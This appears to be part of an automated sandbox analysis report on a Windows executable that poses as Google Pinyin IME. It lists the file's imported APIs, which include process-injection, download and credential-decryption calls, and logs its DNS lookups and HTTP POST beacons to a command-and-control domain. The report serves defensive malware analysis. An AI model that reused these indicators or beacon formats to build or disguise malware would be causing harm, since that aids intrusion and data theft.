KERNEL32.dll | Process32FirstW, AssignProcessToJobObject, GetThreadContext, CreateToolhelp32Snapshot, DuplicateHandle, WriteProcessMemory, ResumeThread, SetInformationJobObject, CreateJobObjectW, GetFileSizeEx, FileTimeToLocalFileTime, GetDriveTypeW, FindFirstFileExW, GetFileInformationByHandle, PeekNamedPipe, FreeResource, VerSetConditionMask, VerifyVersionInfoW, GetVolumeInformationW, GetComputerNameW, Process32NextW, OpenMutexW, CreateProcessW, WaitForSingleObject, GetTickCount, InitializeCriticalSection, WideCharToMultiByte, TerminateProcess, GetModuleFileNameA, IsDebuggerPresent, OutputDebugStringA, ReleaseMutex, GetCurrentProcessId, DebugBreak, GetTempPathA, LocalFree, VirtualQuery, GetCurrentThread, GetSystemTime, CreateSemaphoreW, LoadLibraryW, TerminateThread, ReleaseSemaphore, CreateFileW, WriteFile, ResetEvent, SetEvent, WaitForMultipleObjects, GetSystemDirectoryW, FindFirstFileW, FindNextFileW, GetFullPathNameW, GetShortPathNameW, DeleteFileW, RemoveDirectoryW, LockResource, FindResourceExW, FindClose, GetVersionExW, GetNativeSystemInfo, OpenFileMappingW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, OpenEventW, HeapFree, GetProcessHeap, HeapAlloc, MoveFileExW, GetSystemWow64DirectoryW, OpenProcess, CopyFileW, SetFileAttributesW, FlushViewOfFile, CreateDirectoryW, GetFileSize, MulDiv, CreateTimerQueueTimer, DeleteTimerQueueTimer, GetTempFileNameW, GetTempPathW, ConnectNamedPipe, CreateNamedPipeW, ReadFile, CreateEventW, Sleep, GetSystemDefaultLangID, GetLocaleInfoW, CompareStringW, FlushInstructionCache, SetLastError, lstrcpyW, SetFilePointer, SetEndOfFile, GetStartupInfoW, GetCurrentDirectoryW, MoveFileW, SetCurrentDirectoryW, SystemTimeToFileTime, FileTimeToSystemTime, GetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, HeapDestroy, HeapReAlloc, HeapSize, InterlockedCompareExchange, InterlockedPushEntrySList, IsProcessorFeaturePresent, VirtualFree, VirtualAlloc, InterlockedPopEntrySList, InterlockedExchange, EncodePointer, DecodePointer, UnhandledExceptionFilter, GetCommandLineW, HeapSetInformation, GetSystemTimeAsFileTime, ExitProcess, RtlUnwind, GetCPInfo, LCMapStringW, HeapCreate, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, QueryPerformanceCounter, GetACP, GetOEMCP, IsValidCodePage, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetTimeZoneInformation, GetStringTypeW, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, SetStdHandle, CreateFileA, SetEnvironmentVariableA, VirtualUnlock, VirtualLock, GetProcessWorkingSetSize, CreateThread, CloseHandle, GetCurrentThreadId, DeleteCriticalSection, lstrcmpiW, SetProcessWorkingSetSize, EnterCriticalSection, GetProcAddress, GetLastError, RaiseException, lstrlenW, MultiByteToWideChar, GetModuleFileNameW, LeaveCriticalSection, SizeofResource, InitializeCriticalSectionAndSpinCount, GetModuleHandleW, GetCurrentProcess, InterlockedDecrement, InterlockedIncrement, LoadLibraryExW, LoadResource, FreeLibrary, FindResourceW, SetPriorityClass, CreateMutexW, SetUnhandledExceptionFilter
USER32.dll | FillRect, GetWindowRect, ScreenToClient, SetCursor, EndPaint, UnregisterClassA, DispatchMessageW, DefWindowProcW, MessageBoxW, LoadStringW, PeekMessageW, TranslateMessage, CharNextW, GetMessageW, DestroyWindow, SetCapture, DrawTextW, GetFocus, DialogBoxParamW, TrackMouseEvent, LoadCursorW, MessageBeep, IsWindowEnabled, GetClientRect, SetFocus, SetRectEmpty, BeginPaint, PtInRect, GetDC, IsWindow, GetCapture, DrawFocusRect, OffsetRect, InvalidateRect, GetClassNameW, ReleaseDC, MonitorFromWindow, GetDlgItem, EndDialog, GetSysColor, SetWindowPos, GetCursorPos, CheckDlgButton, ShowWindow, IsDlgButtonChecked, GetActiveWindow, ReleaseCapture, SetDlgItemTextW, SendMessageW, MapWindowPoints, UpdateWindow, EnableWindow, GetDlgCtrlID, SetWindowTextW, GetMonitorInfoW, CallWindowProcW, GetWindow, LoadIconW, GetWindowLongW, SetWindowLongW, GetWindowTextW, GetWindowTextLengthW, CreateWindowExW, RegisterClassW, GetParent, wvsprintfW
VERSION.dll | VerQueryValueW
ole32.dll | CoCreateInstance, CoUninitialize, CoTaskMemRealloc, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromGUID2, CoCreateGuid
OLEAUT32.dll | SafeArrayUnlock, VariantInit, VarUI4FromStr, SysFreeString, SysAllocString, VariantClear, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayCreate, SafeArrayRedim, SafeArrayLock, SafeArrayGetVartype, SafeArrayGetUBound, SafeArrayCopy
COMCTL32.dll | InitCommonControlsEx
GDI32.dll | SetTextColor, CreateFontIndirectW, SetBkMode, DeleteObject, SelectObject, GetObjectW, GetStockObject
dbghelp.dll | SymFunctionTableAccess64, SymGetModuleBase64, StackWalk64
SETUPAPI.dll | SetupInitDefaultQueueCallback, SetupIterateCabinetW, SetupDefaultQueueCallbackW, SetupTermDefaultQueueCallback
WINTRUST.dll | WinVerifyTrust
CRYPT32.dll | CertCloseStore, CertFreeCertificateContext, CryptQueryObject, CertEnumCertificatesInStore, CryptDecodeObject, CryptProtectData, CryptUnprotectData, CertDuplicateCertificateContext, CertNameToStrW
PSAPI.DLL | GetModuleFileNameExW
SHELL32.dll | CommandLineToArgvW, Shell_NotifyIconW, SHGetSpecialFolderPathW, SHCreateDirectoryExW, SHGetFolderPathW, ShellExecuteExW, SHFileOperationW, ShellExecuteW
SHLWAPI.dll | PathRemoveFileSpecW, PathFindExtensionW, PathAddExtensionW, UrlEscapeW, PathFindFileNameW, PathRemoveExtensionW, PathFileExistsW, PathCommonPrefixW, PathRemoveBackslashW, PathCombineW, PathAppendW, PathStripPathW, PathIsDirectoryW, PathIsRelativeW, PathCanonicalizeW
urlmon.dll | URLDownloadToFileW
WININET.dll | HttpOpenRequestW, InternetCloseHandle, DeleteUrlCacheEntryW, InternetCrackUrlW, InternetOpenW, InternetReadFile, InternetConnectW, HttpSendRequestW, HttpQueryInfoW, InternetQueryDataAvailable
IPHLPAPI.DLL | GetAdaptersInfo

Version Infos

Description | Data
LegalCopyright | Copyright (C) 2008
InternalName | Google Pinyin
FileVersion | 2.7.25.128
CompanyName | Google Inc.
ProductName | Google Pinyin IME
ProductVersion | 2.7.25.128
FileDescription | Google Pinyin IME
Translation | 0x0804 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
Chinese | China

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                  Jan 29, 2021 17:38:58.319132090 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:38:58.319205999 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:38:58.319264889 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:38:58.320005894 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:38:58.465327024 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:15.366708040 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:15.366833925 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:15.638581038 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:15.951106071 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:16.560844898 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:17.779493093 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:17.868413925 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.868499041 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:17.915712118 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.942154884 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.942183971 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.942315102 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:17.942575932 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.942600012 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.942687035 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:17.943510056 CET8049720104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:17.998136044 CET4972080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.057656050 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.104093075 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.105513096 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.107032061 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.156493902 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218722105 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218751907 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218769073 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218785048 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218796015 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.218864918 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.218918085 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.219105959 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:24.266268015 CET8049730104.21.23.16192.168.2.5
                                                                                                                                                                  Jan 29, 2021 17:39:24.266556978 CET4973080192.168.2.5104.21.23.16
                                                                                                                                                                  Jan 29, 2021 17:39:30.668939114 CET4972080192.168.2.5104.21.23.16

UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 29, 2021 17:38:38.545653105 CET | 192.168.2.5 | 8.8.8.8 | 0x3eda | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:46.470663071 CET | 192.168.2.5 | 8.8.8.8 | 0x8685 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:48.390662909 CET | 192.168.2.5 | 8.8.8.8 | 0x9341 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:39:23.981044054 CET | 192.168.2.5 | 8.8.8.8 | 0x34f7 | Standard query (0) | 84CFBA021A5A6662.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 29, 2021 17:38:38.608894110 CET | 8.8.8.8 | 192.168.2.5 | 0x3eda | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:38.608894110 CET | 8.8.8.8 | 192.168.2.5 | 0x3eda | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET | 8.8.8.8 | 192.168.2.5 | 0x8685 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:46.521174908 CET | 8.8.8.8 | 192.168.2.5 | 0x8685 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET | 8.8.8.8 | 192.168.2.5 | 0x9341 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:38:48.447154045 CET | 8.8.8.8 | 192.168.2.5 | 0x9341 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET | 8.8.8.8 | 192.168.2.5 | 0x34f7 | No error (0) | 84CFBA021A5A6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:39:24.040030956 CET | 8.8.8.8 | 192.168.2.5 | 0x34f7 | No error (0) | 84CFBA021A5A6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 84cfba021a5a6662.xyz
• 84cfba021a5a6662.xy

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  0192.168.2.549717104.21.23.1680C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  Jan 29, 2021 17:38:38.678960085 CET201OUTPOST //fine/send HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 82
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.679003000 CET | 201 | OUT | Data Ascii: type=install&seller=user01&price=-0.25&guid=5014FFB57E6DEDA3&ver=45.0.0&origin=exe
Jan 29, 2021 17:38:38.736063004 CET | 203 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:38 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09be17b000020742ba61000000001
                                                                                                                                                                  Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a3UCUvsAer7TzlHI7RqZ210zp4MXD4TkVbciut%2BqSqgM88D7lkh5NCuuNNnGNouxY9fCPsAPQ84cnzGgw14sT6V%2FvdKx4QyHNVgG35%2F90O5FN99pkg%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 6194627bfdd62074-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:38:38.736099958 CET | 204 | IN | Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
Jan 29, 2021 17:38:38.736125946 CET | 205 | IN | Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
Jan 29, 2021 17:38:38.736150026 CET | 206 | IN | Data Ascii: /div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
Jan 29, 2021 17:38:38.736166000 CET | 207 | IN | Data Ascii: 0
Jan 29, 2021 17:38:38.746789932 CET | 207 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.746871948 CET | 207 | OUT | Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
Jan 29, 2021 17:38:38.798671007 CET | 209 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:38 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09be1c00000207450ae9000000001
                                                                                                                                                                  Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QwgipNFngtvthWM4vzg5cnnB4phOPVB1H1nJ94d5%2FtLdtPbaa%2BQE7%2BXe%2BYnHqam2aS14GO%2BggKTpIC%2Ff7GX7uk9mowxUSpRH0PBwPJ3%2BX%2BHEB6IJPA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 6194627c6ede2074-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name
Jan 29, 2021 17:38:38.798837900 CET | 210 | IN | Data Ascii: ="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-cs
Jan 29, 2021 17:38:38.798856020 CET | 212 | IN | Data Ascii: umns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pre
Jan 29, 2021 17:38:38.798871040 CET | 213 | IN | Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="tex
Jan 29, 2021 17:38:38.798882008 CET | 213 | IN | Data Ascii: 0
Jan 29, 2021 17:38:38.929573059 CET | 213 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:38.929651022 CET | 214 | OUT | Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
Jan 29, 2021 17:38:38.990947008 CET | 215 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:38 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d7bca264b855809d8d4b05eb87c1fc9ff1611938318; expires=Sun, 28-Feb-21 16:38:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09be27c00002074ed374000000001
                                                                                                                                                                  Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=P8QyBKprq2Hhaamq%2BMcuho9cb135xpo%2BSZUjTzq%2F%2FDTBAYHPz9WKa43m0lSZZP4TsqaIIuYbjMSN5kJmH%2FyM4akUqL0NiC1MuYLr%2BxDyR412x2QkFQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 6194627d8a242074-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
Jan 29, 2021 17:38:38.990974903 CET | 216 | IN | Data Ascii: ewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' h
Jan 29, 2021 17:38:38.991370916 CET | 218 | IN | Data Ascii: two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretend
Jan 29, 2021 17:38:42.105988979 CET | 251 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Jan 29, 2021 17:38:42.106060028 CET | 252 | OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
                                                                                                                                                                  Jan 29, 2021 17:38:42.157530069 CET | 253 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:42 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=dafc2269efb29a3d032863a3cf4025f661611938322; expires=Sun, 28-Feb-21 16:38:42 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09beede0000207413915000000001
                                                                                                                                                                  Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LgciL5091s7SgIANBDdXrT5hElDO3RYRQ8s%2F1XbWIWN%2BGoj8y34Mb9NMoV2Wm105WERrjf22gNgxarQqxw%2BdkZuNj2d1pZIgsL0RpJ6OryQrhHRwrQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462916ad42074-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                  1 | 192.168.2.5 | 49720 | 104.21.23.16 | 80 | C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                  Jan 29, 2021 17:38:46.580929995 CET | 258 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Jan 29, 2021 17:38:46.580970049 CET | 258 | OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
                                                                                                                                                                  Jan 29, 2021 17:38:46.659503937 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:46 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d1a284289fa3f4f3ff90e51abb2deb23a1611938326; expires=Sun, 28-Feb-21 16:38:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
